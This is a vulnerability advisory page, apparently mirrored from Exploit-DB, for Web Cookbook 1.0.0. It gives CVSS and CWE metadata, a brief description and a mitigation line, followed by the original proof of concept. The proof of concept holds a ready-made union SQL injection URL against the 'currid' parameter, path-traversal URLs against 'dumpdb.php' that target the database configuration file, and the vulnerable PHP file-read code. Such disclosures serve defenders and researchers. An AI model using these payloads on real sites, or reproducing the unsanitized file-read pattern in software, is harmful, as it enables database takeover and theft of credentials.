Web Cookbook Multiple Vulnerability

vendor:

Web Cookbook

by:

cr4wl3r

8,8

CVSS

HIGH

SQL Injection, Remote File Disclosure

89, 522

CWE

Product Name: Web Cookbook

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:webcookbook:web_cookbook

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2013

Web Cookbook Multiple Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in 'currid' parameter of 'rezeptanzeige.php' script and in 'outfile' parameter of 'dumpdb.php' script. A remote attacker can execute arbitrary SQL commands in application's database, disclose arbitrary files from the server and gain access to sensitive information. The vulnerability is confirmed in version 1.0.0. Other versions may also be affected.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also restrict access to sensitive files and directories.

Source

Exploit-DB raw data:

# Web Cookbook Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script: http://sourceforge.net/projects/webcookbook/
# Tested: Win 7

# Proof of Concept
# SQL Injection

http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]
http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--

# Remote File Disclosure
# Bugs found /admin/dumpdb.php

--------------------------
1 <?php
2 $outfile = $_GET['outfile'];
3 header("Content-Type: text/plain");
4 header("Content-length: " . filesize("../upload/" . $outfile));
5 header("Content-Disposition: attachment; filename=" . $outfile);
6 readfile("../upload/" . $outfile);
7 ?>
--------------------------

http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php

# Demo:
http://bastardlabs.info/demo/WebCookbook1.png
http://bastardlabs.info/demo/WebCookbook2.png